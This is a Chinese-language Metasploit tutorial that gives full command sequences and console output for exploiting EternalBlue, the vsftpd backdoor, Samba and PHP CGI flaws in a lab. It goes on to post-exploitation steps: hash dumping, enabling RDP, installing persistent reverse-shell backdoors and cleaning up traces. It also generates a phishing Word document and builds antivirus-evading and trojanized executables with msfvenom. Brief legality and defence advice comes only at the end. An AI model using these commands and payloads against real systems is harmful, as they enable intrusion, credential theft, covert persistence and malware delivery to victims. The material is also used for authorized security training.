精通Metasploit Framework：网络安全攻防实战与全链路渗透解析

一、手把手教学：永恒之蓝漏洞攻防实战详解

1.1 漏洞背景与核心原理

漏洞编号：MS17-010（CVE-2017-0144）

影响范围：Windows Vista/7/8.1/10，Windows Server 2008/2012/2016

漏洞类型：SMB协议远程代码执行漏洞

危害等级：严重（CVSS 8.8/10）

永恒之蓝漏洞位于Windows SMBv1协议处理模块中，攻击者通过发送精心构造的恶意数据包，可以实现远程代码执行，进而完全控制目标系统。这个漏洞是2017年"WannaCry"勒索软件爆发的根源，造成了全球性的网络安全危机。

1.2 环境搭建详细步骤

攻击环境准备：

# 1. 攻击机配置（Kali Linux） # 检查网络配置 ifconfig eth0 # 确保IP地址为：192.168.1.10 # 2. 安装必要的工具 sudo apt update sudo apt install metasploit-framework -y # 3. 启动Metasploit数据库 sudo systemctl start postgresql sudo msfdb init

靶机环境准备：

靶机：Windows 7 SP1（x64） 配置要求： - 禁用Windows防火墙 - 确保445端口开放 - 确认未安装KB4012212/KB4012215补丁 - IP地址：192.168.1.100

1.3 详细攻击流程解析

步骤1：启动MSF并搜索相关模块

# 启动MSF控制台 msfconsole # 在MSF控制台中搜索永恒之蓝模块 msf6 > search ms17_010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 2 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

说明：这里显示了3个相关模块：

• 模块0：永恒之蓝核心漏洞利用模块

• 模块1：漏洞检测扫描模块

• 模块2：利用漏洞进行Psexec攻击的模块

步骤2：使用扫描模块确认漏洞存在

# 使用扫描模块 msf6 > use auxiliary/scanner/smb/smb_ms17_010 # 查看模块配置选项 msf6 auxiliary(scanner/smb/smb_ms17_010) > show options Module options (auxiliary/scanner/smb/smb_ms17_010): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The SMB service port (TCP) THREADS 1 yes The number of concurrent threads (max one per host) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as # 设置目标IP msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.100 RHOSTS => 192.168.1.100 # 执行扫描 msf6 auxiliary(scanner/smb/smb_ms17_010) > run [*] 192.168.1.100:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

结果解读：

• 如果看到VULNERABLE提示，表示目标存在漏洞

• 如果看到NOT vulnerable，则表示目标已打补丁

步骤3：使用永恒之蓝攻击模块

# 返回上级 msf6 auxiliary(scanner/smb/smb_ms17_010) > back # 使用永恒之蓝攻击模块 msf6 > use exploit/windows/smb/ms17_010_eternalblue # 查看模块详细信息 msf6 exploit(windows/smb/ms17_010_eternalblue) > info Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption Module: exploit/windows/smb/ms17_010_eternalblue Platform: Windows Arch: x86, x64 Privileged: Yes License: Metasploit Framework License (BSD) Rank: Average Disclosed: 2017-03-14

步骤4：配置攻击参数

# 查看需要设置的参数 msf6 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs # 设置目标IP msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100 RHOSTS => 192.168.1.100 # 查看可用的Payload msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads Compatible Payloads =================== # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 generic/custom normal No Custom Payload 1 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline 2 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline 3 windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager 4 windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager # 选择Meterpreter反向TCP Payload msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp # 查看Payload需要设置的参数 msf6 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.1.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs # 设置攻击机IP和端口 msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.10 LHOST => 192.168.1.10 msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444 LPORT => 4444

步骤5：执行攻击

# 执行攻击 msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.1.10:4444 [*] 192.168.1.100:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 192.168.1.100:445 - Scanned 1 of 1 hosts (100% complete) [*] 192.168.1.100:445 - Connecting to target for exploitation. [+] 192.168.1.100:445 - Connection established for exploitation. [+] 192.168.1.100:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.1.100:445 - CORE raw buffer dump (42 bytes) [*] 192.168.1.100:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 192.168.1.100:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 192.168.1.100:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 192.168.1.100:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.1.100:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.1.100:445 - Sending all but last fragment of exploit packet [*] 192.168.1.100:445 - Starting non-paged pool grooming [+] 192.168.1.100:445 - Sending SMBv2 buffers [+] 192.168.1.100:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.1.100:445 - Sending final SMBv2 buffers. [*] 192.168.1.100:445 - Sending last fragment of exploit packet [*] 192.168.1.100:445 - Receiving response from exploit packet [+] 192.168.1.100:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.1.100:445 - Sending egg to corrupted connection. [*] 192.168.1.100:445 - Triggering free of corrupted buffer. [*] Sending stage (201283 bytes) to 192.168.1.100 [*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.100:49158) at 2023-10-01 10:00:00 +0800 [+] 192.168.1.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.1.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.1.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= meterpreter >

攻击过程解析：

1. 启动反向TCP监听器

2. 检测目标是否存在漏洞

3. 建立SMB连接

4. 发送精心构造的恶意数据包

5. 利用内核池溢出漏洞

6. 发送Payload并执行

7. 建立Meterpreter会话

1.4 Meterpreter会话详细操作

获得Meterpreter会话后，可以进行各种后渗透操作：

# 1. 获取系统信息 meterpreter > sysinfo Computer : WIN7-PC OS : Windows 7 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : zh_CN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows # 2. 获取当前权限 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM # 3. 获取进程列表 meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System x64 0 264 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe 332 324 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe 384 376 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe ... ... ... ... ... ... ... # 4. 进程迁移（重要：避免被检测） meterpreter > getpid Current pid: 3724 meterpreter > migrate 656 [*] Migrating from 3724 to 656... [*] Migration completed successfully. # 5. 屏幕截图 meterpreter > screenshot Screenshot saved to: /root/WjVfJmhT.jpeg # 可以打开查看：xdg-open /root/WjVfJmhT.jpeg # 6. 获取用户密码哈希 meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: # 7. 启用远程桌面 meterpreter > run post/windows/manage/enable_rdp [*] Enabling Remote Desktop [*] RDP is already enabled [*] Setting Terminal Services service startup mode [*] The Terminal Services service is not set to auto, changing it to auto ... [*] Opening port in local firewall if necessary [*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20231001100000_default_192.168.1.100_host.windows.cle_123456.txt

1.5 创建持久后门

# 1. 使用persistence模块创建持久后门 meterpreter > run persistence -U -i 60 -p 4444 -r 192.168.1.10 [*] Running Persistence Script [*] Resource file for cleanup created: /root/.msf4/logs/persistence/WIN7-PC_20231001.1000.ps1 [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 [*] Persistent agent script is 99627 bytes long [+] Persistent Script written to C:\Windows\TEMP\default.exe [*] Executing script C:\Windows\TEMP\default.exe [+] Agent executed with PID 4084 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QfVhLzVlWXv [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QfVhLzVlWXv

参数说明：

• -U：用户登录时启动

• -i 60：每60秒尝试连接一次

• -p 4444：连接端口

• -r 192.168.1.10：攻击机IP地址

1.6 清理痕迹

# 1. 查看创建的持久化脚本位置 meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v QfVhLzVlWXv Key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Name: QfVhLzVlWXv Data: C:\Windows\TEMP\default.exe # 2. 删除注册表项 meterpreter > reg deleteval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v QfVhLzVlWXv [*] Deleted QfVhLzVlWXv from HKLM\Software\Microsoft\Windows\CurrentVersion\Run # 3. 删除可执行文件 meterpreter > rm C:\\Windows\\TEMP\\default.exe

二、Linux靶机渗透：Metasploitable 2攻防实战

2.1 靶机：Metasploitable 2介绍

Metasploitable 2是专门为渗透测试学习设计的漏洞靶机，包含多种常见漏洞：

主要服务：

• FTP (vsftpd 2.3.4)

• SSH (OpenSSH 4.7p1)

• Telnet

• SMTP

• HTTP (Apache 2.2.8)

• Samba (3.x)

• MySQL

• PostgreSQL

• 等等

IP地址：192.168.1.150

2.2 利用vsftpd 2.3.4后门漏洞

# 1. 搜索vsftpd漏洞 msf6 > search vsftpd Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes VSFTPD v2.3.4 Backdoor Command Execution # 2. 使用漏洞利用模块 msf6 > use exploit/unix/ftp/vsftpd_234_backdoor # 3. 查看模块信息 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info Name: VSFTPD v2.3.4 Backdoor Command Execution Module: exploit/unix/ftp/vsftpd_234_backdoor Platform: Unix Arch: cmd Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2011-07-03 # 4. 配置参数 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 21 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Automatic # 5. 设置目标IP msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.150 RHOSTS => 192.168.1.150 # 6. 执行攻击 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit [*] 192.168.1.150:21 - Banner: 220 (vsFTPd 2.3.4) [*] 192.168.1.150:21 - USER: 331 Please specify the password. [+] 192.168.1.150:21 - Backdoor service has been spawned, handling... [+] 192.168.1.150:21 - UID: uid=0(root) gid=0(root) [*] Found shell. [*] Command shell session 2 opened (192.168.1.10:4444 -> 192.168.1.150:6200) at 2023-10-01 10:30:00 +0800 # 7. 验证权限 whoami root pwd / ls -la

漏洞原理：

vsftpd 2.3.4版本存在后门，当用户名包含特定字符时，会在6200端口打开一个shell。这个后门是攻击者故意插入的。

2.3 利用Samba漏洞

# 1. 搜索Samba漏洞 msf6 > search samba # 2. 使用usermap_script漏洞 msf6 > use exploit/multi/samba/usermap_script # 3. 配置参数 msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.1.150 RHOSTS => 192.168.1.150 msf6 exploit(multi/samba/usermap_script) > set PAYLOAD cmd/unix/reverse_netcat PAYLOAD => cmd/unix/reverse_netcat msf6 exploit(multi/samba/usermap_script) > set LHOST 192.168.1.10 LHOST => 192.168.1.10 # 4. 执行攻击 msf6 exploit(multi/samba/usermap_script) > exploit [*] Started reverse TCP handler on 192.168.1.10:4444 [*] Command shell session 3 opened (192.168.1.10:4444 -> 192.168.1.150:56728) at 2023-10-01 10:40:00 +0800 whoami root

三、Web应用漏洞利用案例深度解析

3.1 PHP代码注入漏洞利用

# 1. 使用PHP CGI参数注入漏洞 msf6 > use exploit/multi/http/php_cgi_arg_injection # 2. 配置参数 msf6 exploit(multi/http/php_cgi_arg_injection) > set RHOSTS 192.168.1.200 RHOSTS => 192.168.1.200 msf6 exploit(multi/http/php_cgi_arg_injection) > set TARGETURI /vulnerable.php TARGETURI => /vulnerable.php msf6 exploit(multi/http/php_cgi_arg_injection) > set PAYLOAD php/meterpreter/reverse_tcp PAYLOAD => php/meterpreter/reverse_tcp msf6 exploit(multi/http/php_cgi_arg_injection) > set LHOST 192.168.1.10 LHOST => 192.168.1.10 # 3. 执行攻击 msf6 exploit(multi/http/php_cgi_arg_injection) > exploit [*] Started reverse TCP handler on 192.168.1.10:4444 [*] Sending stage (39927 bytes) to 192.168.1.200 [*] Meterpreter session 4 opened (192.168.1.10:4444 -> 192.168.1.200:443) at 2023-10-01 11:00:00 +0800 meterpreter > sysinfo Computer : webserver OS : Linux webserver 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 Meterpreter : php/linux

3.2 Web目录扫描实战

# 1. 使用dir_scanner模块 msf6 > use auxiliary/scanner/http/dir_scanner # 2. 配置参数 msf6 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.1.200 RHOSTS => 192.168.1.200 msf6 auxiliary(scanner/http/dir_scanner) > set RPORT 80 RPORT => 80 msf6 auxiliary(scanner/http/dir_scanner) > set THREADS 20 THREADS => 20 msf6 auxiliary(scanner/http/dir_scanner) > set PATH /usr/share/wordlists/dirb/common.txt PATH => /usr/share/wordlists/dirb/common.txt # 3. 执行扫描 msf6 auxiliary(scanner/http/dir_scanner) > run [*] Detecting error code [*] Using code '404' as not found for 192.168.1.200 [*] Found http://192.168.1.200:80/admin/ 200 (192.168.1.200) [*] Found http://192.168.1.200:80/backup/ 200 (192.168.1.200) [*] Found http://192.168.1.200:80/config/ 200 (192.168, 192.168.1.200) [*] Found http://192.168.1.200:80/phpmyadmin/ 200 (192.168.1.200) [*] Found http://192.168.1.200:80/upload/ 200 (192.168.1.200) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

四、高级攻击技术：社会工程学与权限维持

4.1 社会工程学攻击：恶意文档生成

# 1. 使用MSF生成恶意Word文档 msf6 > use exploit/windows/fileformat/office_word_hta # 2. 配置参数 msf6 exploit(windows/fileformat/office_word_hta) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf6 exploit(windows/fileformat/office_word_hta) > set LHOST 192.168.1.10 LHOST => 192.168.1.10 msf6 exploit(windows/fileformat/office_word_hta) > set LPORT 4444 LPORT => 4444 msf6 exploit(windows/fileformat/office_word_hta) > set FILENAME 重要通知.doc FILENAME => 重要通知.doc # 3. 生成恶意文档 msf6 exploit(windows/fileformat/office_word_hta) > exploit [*] Creating '重要通知.doc' file ... [+] 重要通知.doc stored at /root/.msf4/local/重要通知.doc

攻击流程：

1. 将生成的恶意文档发送给目标用户

2. 当用户打开文档时，会触发恶意代码

3. 建立Meterpreter会话

4.2 绕过杀毒软件的免杀Payload

# 1. 使用msfvenom生成免杀Payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o payload.exe # 2. 使用多重编码增强免杀效果 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 | msfvenom -e x86/countdown -i 5 -f exe -o payload_encoded.exe # 3. 嵌入正常程序 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -x /usr/share/windows-binaries/putty.exe -f exe -o putty_backdoor.exe

4.3 权限提升案例

# 在已获取的Meterpreter会话中 # 1. 查看当前权限 meterpreter > getuid Server username: WIN7-PC\User # 2. 尝试本地提权 meterpreter > background [*] Backgrounding session 1... # 搜索本地提权模块 msf6 > search platform:windows type:exploit local # 3. 使用MS16-032提权漏洞 msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc # 4. 配置参数 msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1 SESSION => 1 msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 192.168.1.10 LHOST => 192.168.1.10 msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LPORT 5555 LPORT => 5555 # 5. 执行提权 msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit [*] Started reverse TCP handler on 192.168.1.10:5555 [*] Writing payload : 738 bytes... [*] Exploit completed, but no session was created.

五、综合实战：完整渗透测试流程

5.1 信息收集阶段

# 1. 使用NMAP进行端口扫描 nmap -sS -sV -O -p- 192.168.1.0/24 # 2. 使用MSF辅助模块扫描 msf6 > use auxiliary/scanner/portscan/tcp msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-1000 msf6 auxiliary(scanner/portscan/tcp) > set THREADS 100 msf6 auxiliary(scanner/portscan/tcp) > run # 3. 服务版本识别 msf6 > use auxiliary/scanner/http/http_version msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.1.100 msf6 auxiliary(scanner/http/http_version) > run

5.2 漏洞扫描阶段

# 1. 使用Nessus导入MSF msf6 > load nessus [*] Nessus Bridge for Metasploit 1.2.1 [*] Type nessus_help for a command listing [*] Successfully loaded plugin: nessus # 2. 使用OpenVAS msf6 > load openvas [*] Welcome to OpenVAS integration by kost and averagesecurityguy. [*] OpenVAS integration requires a database connection. Once the [*] database is ready, connect to the OpenVAS server using openvas_connect. [*] For additional commands use openvas_help. [*] Successfully loaded plugin: openvas

5.3 漏洞利用阶段

根据扫描结果选择合适的漏洞利用模块，如前文所示的永恒之蓝、Samba漏洞等。

5.4 后渗透阶段

# 1. 获取敏感信息 meterpreter > run post/windows/gather/credentials/windows_autologin meterpreter > run post/windows/gather/enum_logged_on_users meterpreter > run post/windows/gather/enum_shares # 2. 横向移动 meterpreter > run post/windows/gather/enum_ad_users meterpreter > run post/windows/gather/enum_ad_computers # 3. 权限维持 meterpreter > run persistence -U -i 60 -p 4444 -r 192.168.1.10

六、注意事项与防御建议

6.1 攻击注意事项

1. 合法授权：只在获得书面授权的环境中进行测试

2. 影响评估：了解攻击可能造成的影响，避免生产环境崩溃

3. 数据备份：攻击前备份重要数据

4. 时间选择：在业务低峰期进行测试

5. 记录日志：详细记录每一步操作

6.2 防御建议

1. 及时更新：定期安装系统补丁

2. 最小权限：遵循最小权限原则

3. 网络隔离：划分网络安全区域

4. 安全监控：部署IDS/IPS系统

5. 安全意识：加强员工安全意识培训

七、MSF常用命令速查表

# 基本信息 version # 查看MSF版本 banner # 显示横幅 help # 查看帮助 history # 查看命令历史 # 模块管理 use # 使用模块 back # 返回上级 search # 搜索模块 info # 查看模块信息 show options # 显示模块选项 show payloads # 显示可用Payload # 会话管理 sessions # 查看会话列表 sessions -i ID # 进入指定会话 background # 后台当前会话 sessions -k ID # 结束指定会话 # 数据库操作 db_status # 查看数据库状态 db_nmap # 执行NMAP扫描并导入结果 db_import # 导入扫描结果 db_hosts # 查看主机列表 db_services # 查看服务列表

总结

通过以上详细的案例介绍，你应该对MSF的实战应用有了更深入的理解。从信息收集、漏洞扫描、漏洞利用到后渗透，MSF提供了一个完整的渗透测试解决方案。记住，技术是中立的，关键在于使用者的目的。希望你能将所学知识用于合法的安全测试和安全防御工作中。

学习路径建议：

1. 搭建虚拟实验环境

2. 从基础模块开始练习

3. 复现经典漏洞案例

4. 尝试组合多种攻击技术

5. 学习编写自己的模块

6. 参与CTF比赛和漏洞挖掘实践

网络安全是一个不断发展的领域，只有持续学习和实践，才能保持竞争力。祝你在网络安全的学习道路上不断进步！

最后提醒：本文所有技术仅用于学习防御。未经授权的测试是违法行为，请一定通过合法途径学习和实践网络安全技术。

用你的技能让网络世界更安全，而不是更危险。每个技术人员都有责任保护用户的安全和隐私。

安全之路，正道而行。